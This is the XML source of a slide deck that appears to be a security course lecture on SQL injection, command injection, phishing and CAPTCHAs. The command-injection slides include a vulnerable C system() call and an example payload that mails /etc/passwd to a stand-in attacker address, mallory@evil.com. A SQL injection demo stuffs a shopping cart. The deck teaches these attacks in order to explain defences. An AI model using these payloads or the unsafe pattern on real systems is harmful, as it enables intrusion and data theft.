              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="516" name="Google Shape;516;p61"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="515" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4218200" y="2207800"/>
              <a:ext cx="316500" cy="907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2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/>
              <a:t> Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522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3" name="Google Shape;523;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="9543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find_employee(char *regex) {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char cmd[512];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snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);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system(cmd);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4" name="Google Shape;524;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775"/>
            <a:ext cx="6703200" cy="338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grep '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'; mail mallory@evil.com &lt; /etc/passwd; touch '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' phonebook.txt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5" name="Google Shape;525;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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regex = "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'; mail mallory@evil.com &lt; /etc/passwd; touch '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b="1" sz="10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6" name="Google Shape;526;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="12555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527" name="Google Shape;527;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250"/>
            <a:ext cx="106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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Google Shape;528;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="18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/>
              <a:t> Command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3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Defending Against Command Injection in General</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534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5" name="Google Shape;535;p63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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Input sanitization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 before, this is hard to implement and difficult to get 100% correct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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Use safe APIs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general, remember the KISS principle: Keep It Simple, Stupid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/>
              <a:t>, executing a shell to execute a command is too powerful!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Instead, use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execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, which directly executes the program with arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>without parsing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Most programming languages have safe APIs that should be use instead of parsing untrusted input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/>
              <a:t> (unsafe) and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execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (safe) in C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os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (unsafe) and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subprocess.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (safe) in Python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exec.Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (safe) in Go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Go only has the safe version!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Say it with me: Consider human factors!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CAPTCHAs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541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5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Websites are for Humans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Google Shape;547;p65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websites are designed for human usage, not robot usage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A login page is for users to submit their password, not for an attacker to automate a brute-force attack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Robot access of websites can lead to attacks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Denial of service: Overwhelming a web server by flooding it with requests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We’ll see more denial-of-service later in the networking unit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Spam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More specific exploitation (e.g. scalping tickets/graphics cards when they go on sale)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;548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Phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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Phishing: Trick the victim into sending the attacker personal information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malicious website impersonates a legitimate website to trick the user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Don’t blame the users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Detecting phishing is hard, especially if you aren’t a security expert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Check the URL? Still vulnerable to homograph attacks (malicious URLs that look legitimate)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Check the entire browser? Still vulnerable to browser-in-browser attacks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Two-Factor Authentication (2FA)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 must prove their identity two different ways (something you know, something you own, something you are)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Defends against attacks where an attacker has only stolen one factor (e.g. the password)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Vulnerable to relay attacks: The attacker phishes the victim into giving up both factors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Vulnerable to social engineering attacks: Trick humans to subvert 2FA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Authentication tokens for generating secure two-factor codes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Security keys to prevent phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;10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6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CAPTCHAs: Definition</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p66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CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A challenge that is easy for a human to solve, but hard for a computer to solve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“Completely Automated Public Turing test to tell Computers and Humans Apart”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Sometimes called a “reverse Turing test”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Used to distinguish web requests made by humans and web requests made by robots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Usage: Administer a CAPTCHA, and if it passes, assume that the user is human and allow access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555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7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CAPTCHAs: Examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p67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Reading distorted text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Identifying images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Listening to an audio clip and typing out the words spoken</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562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3" name="Google Shape;56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0075" y="1318450"/>
            <a:ext cx="3053225" cy="1356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3413" y="2774869"/>
            <a:ext cx="2826557" cy="1994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0" name="Google Shape;570;p68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CAPTCHAs and Machine Learning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p68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Modern CAPTCHAs have another purpose: Training machine learning algorithms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Machine learning often requires manually-labeled datasets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CAPTCHAs crowdsource human power to help manually label these big datasets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Machine vision problems require manually-labeled examples: “This is a stop sign”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="572" name="Google Shape;57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1273" y="1490825"/>
            <a:ext cx="2037451" cy="294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8" name="Google Shape;578;p69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CAPTCHAs and Machine Learning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="579" name="Google Shape;57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7025" y="1276400"/>
            <a:ext cx="3771900" cy="37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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364550" y="4413650"/>
            <a:ext cx="358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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Modern CAPTCHAs are used to train machine learning algorithms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6" name="Google Shape;586;p70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CAPTCHAs: Issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="5142600" cy="3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Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder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Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily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Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!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all bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad bots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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Crawler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bots help archive webpages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="588" name="Google Shape;58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6138" y="1463125"/>
            <a:ext cx="1843650" cy="110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4272" y="3602047"/>
            <a:ext cx="2847375" cy="74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9788" y="2680685"/>
            <a:ext cx="2596349" cy="94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2413" y="4415728"/>
            <a:ext cx="2231108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7" name="Google Shape;597;p71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CAPTCHAs: Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p71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Outsourcing attack: Pay humans to solve CAPTCHAs for you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CAPTCHAs only verify that there is a human in the loop; everything else can be automated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Usually costs a few cents per CAPTCHA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CAPTCHAs end up just distinguishing which attackers are willing to spend money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Remember: Security is economics!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="599" name="Google Shape;59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1100" y="1887079"/>
            <a:ext cx="2445075" cy="24850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00" name="Google Shape;60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1574" y="1907063"/>
            <a:ext cx="2722424" cy="2445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6" name="Google Shape;606;p72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Injection: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Google Shape;607;p72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 servers interact with databases to store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Web servers use SQL to interact with databases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SQL injection: Untrusted input is used as parsed SQL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attacker can construct their own queries to run on the SQL server!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Blind SQL injection: SQLi with little to no feedback from the SQL query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Defense: Input sanitization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Difficult to implement correctly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Defense: Prepared statements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Data only ever treated as data; bulletproof!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Command injection: Untrusted input is used as any parsed language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Defense: Keep it simple and use safe API calls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3" name="Google Shape;613;p73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CAPTCHAs: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Google Shape;614;p73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CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve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Examples: Reading distorted text, identifying images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Original purpose: Distinguishing between humans and bots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Modern purpose: Forces the attacker to spend some money to solve the CAPTCHAs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Modern purpose: Providing training data for machine learning algorithms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Issues with CAPTCHAs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 computer algorithms get smarter, CAPTCHAs get harder, and not all humans are able to solve them easily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Ambiguity: CAPTCHAs might be so hard that the validator doesn't know the solution either!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Economics: Breaking CAPTCHAs just costs money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all bots are bad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Optional Bonus Slides: SQL Injection Demo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Google Shape;620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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="2893200"/>
            <a:ext cx="8583900" cy="11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26" name="Google Shape;626;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156550" y="465100"/>
            <a:ext cx="1666800" cy="28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75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step 1: what does the SQL interpreter see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628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9" name="Google Shape;62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550"/>
            <a:ext cx="7004150" cy="267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22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Today: SQL Injection and CAPTCHAS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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Structure of modern web services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SQL injection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Defenses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Command injection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Defenses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CAPTCHAs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Subverting CAPTCHAs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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="2893200"/>
            <a:ext cx="8583900" cy="11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35" name="Google Shape;635;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156550" y="465100"/>
            <a:ext cx="1666800" cy="28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76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step 1: what does the SQL interpreter see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637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8" name="Google Shape;63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550"/>
            <a:ext cx="7004150" cy="267925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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="4022850"/>
            <a:ext cx="8583900" cy="11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&gt; INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="18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VALUES ('</a:t>
            </a:r>
            <a:r>
              <a:rPr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____________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', '</a:t>
            </a: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____________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')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sessionToken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item</a:t>
            </a:r>
            <a:endParaRPr sz="18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77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156550" y="465100"/>
            <a:ext cx="1666800" cy="28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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="270875"/>
            <a:ext cx="897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SQLi Step 2: what do we want the SQL interpreter to see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646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7" name="Google Shape;64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550"/>
            <a:ext cx="7004150" cy="267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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156550" y="465100"/>
            <a:ext cx="1666800" cy="28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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="270875"/>
            <a:ext cx="897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SQLi Step 2: what do we want the SQL interpreter to see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Google Shape;654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5" name="Google Shape;65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550"/>
            <a:ext cx="7004150" cy="267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79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156550" y="465100"/>
            <a:ext cx="1666800" cy="28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79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="270875"/>
            <a:ext cx="897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SQLi Step 2: what do we want the SQL interpreter to see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;662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3" name="Google Shape;66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550"/>
            <a:ext cx="7004150" cy="267925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79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="3946650"/>
            <a:ext cx="8583900" cy="11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&gt; INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="18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VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),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('123', 'toilet paper'), ... ('123', 'toilet paper')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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="1150600"/>
            <a:ext cx="8583900" cy="11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SQL interpreter sees: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 INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('</a:t>
            </a:r>
            <a:r>
              <a:rPr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____________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', '</a:t>
            </a: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____________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')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sessionToken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item</a:t>
            </a:r>
            <a:endParaRPr sz="18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We want the SQL interpreter to see:</a:t>
            </a:r>
            <a:b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 INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),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('123', 'toilet paper'), ... ('123', 'toilet paper')</a:t>
            </a:r>
            <a:endParaRPr sz="18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0" name="Google Shape;670;p80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step 3: compare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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="1150600"/>
            <a:ext cx="8583900" cy="44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SQL interpreter sees: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 INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('</a:t>
            </a:r>
            <a:r>
              <a:rPr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____________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', '</a:t>
            </a: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____________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')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sessionToken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item</a:t>
            </a:r>
            <a:endParaRPr sz="18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We want the SQL interpreter to see:</a:t>
            </a:r>
            <a:b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 INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('</a:t>
            </a:r>
            <a:r>
              <a:rPr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', '</a:t>
            </a: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toilet paper'), ('123', 'toilet paper'),</a:t>
            </a:r>
            <a:endParaRPr sz="18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('123', 'toilet paper'), ... ('123', 'toilet paper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')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6" name="Google Shape;676;p81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step 3: compare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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="1150600"/>
            <a:ext cx="8583900" cy="44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SQL interpreter sees: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 INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('</a:t>
            </a:r>
            <a:r>
              <a:rPr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____________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', '</a:t>
            </a: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____________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')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sessionToken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item</a:t>
            </a:r>
            <a:endParaRPr sz="18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We want the SQL interpreter to see:</a:t>
            </a:r>
            <a:b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 INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('</a:t>
            </a:r>
            <a:r>
              <a:rPr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', '</a:t>
            </a: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toilet paper'), ('123', 'toilet paper'),</a:t>
            </a:r>
            <a:endParaRPr sz="18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('123', 'toilet paper'), ... ('123', 'toilet paper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')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sessionToken = </a:t>
            </a:r>
            <a:r>
              <a:rPr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endParaRPr sz="18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item = </a:t>
            </a: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toilet paper'), ('123', 'toilet paper'),</a:t>
            </a:r>
            <a:endParaRPr sz="18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('123', 'toilet paper'), ... ('123', 'toilet paper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2" name="Google Shape;682;p82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step 4: ???   step 5: profit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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;11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" name="Google Shape;116;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512100" y="4520775"/>
            <a:ext cx="8119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</a:rPr>
              <a:t>Textbook Chapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 17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25 Most Dangerous Software Weaknesses (2020)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;12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23" name="Google Shape;123;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="412300" y="1239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{067DF1A0-50DC-4D23-8D0C-FF9689CADC95}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="535825"/>
                <a:gridCol w="779400"/>
                <a:gridCol w="5653200"/>
                <a:gridCol w="746075"/>
              </a:tblGrid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Rank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ID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Name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Score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120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[1]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3"/>
                        </a:rPr>
                        <a:t>CWE-79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Neutralization of Input During Web Page Generation (’Cross-site Scripting’)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46.82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110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[2]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4"/>
                        </a:rPr>
                        <a:t>CWE-787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Out-of-bounds Write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46.17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[3]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5"/>
                        </a:rPr>
                        <a:t>CWE-20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Input Validation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33.47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[4]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6"/>
                        </a:rPr>
                        <a:t>CWE-125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Out-of-bounds Read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26.50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[5]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7"/>
                        </a:rPr>
                        <a:t>CWE-119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Restriction of Operations within the Bounds of a Memory Buffer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23.73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02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[6]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8"/>
                        </a:rPr>
                        <a:t>CWE-89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Neutralization of Special Elements used in an SQL Command (’SQL Injection’)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20.69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[7]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9"/>
                        </a:rPr>
                        <a:t>CWE-200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Exposure of Sensitive Information to an Unauthorized Actor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19.16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[8]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0"/>
                        </a:rPr>
                        <a:t>CWE-416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Use After Free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18.87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[9]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1"/>
                        </a:rPr>
                        <a:t>CWE-352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Cross-Site Request Forgery (CSRF)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17.29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02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[10]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2"/>
                        </a:rPr>
                        <a:t>CWE-78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Neutralization of Special Elements used in an OS Command (’OS Command Injection’)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16.44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[11]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3"/>
                        </a:rPr>
                        <a:t>CWE-190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Integer Overflow or Wraparound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15.81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[12]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4"/>
                        </a:rPr>
                        <a:t>CWE-22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Limitation of a Pathname to a Restricted Directory (’Path Traversal’)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13.67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[13]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5"/>
                        </a:rPr>
                        <a:t>CWE-476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NULL Pointer Dereference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8.35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[14]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6"/>
                        </a:rPr>
                        <a:t>CWE-287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Authentication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8.17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[15]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7"/>
                        </a:rPr>
                        <a:t>CWE-434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Unrestricted Upload of File with Dangerous Type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7.38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[16]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8"/>
                        </a:rPr>
                        <a:t>CWE-732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Incorrect Permission Assignment for Critical Resource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6.95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[17]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9"/>
                        </a:rPr>
                        <a:t>CWE-94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Control of Generation of Code (’Code Injection’)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6.53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Web Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p25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websites need to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>store and retrieve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Examples: User accounts, comments, prices, etc.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HTTP server only handles the HTTP requests, and it needs to have some way of storing and retrieving persisted data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;13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S 16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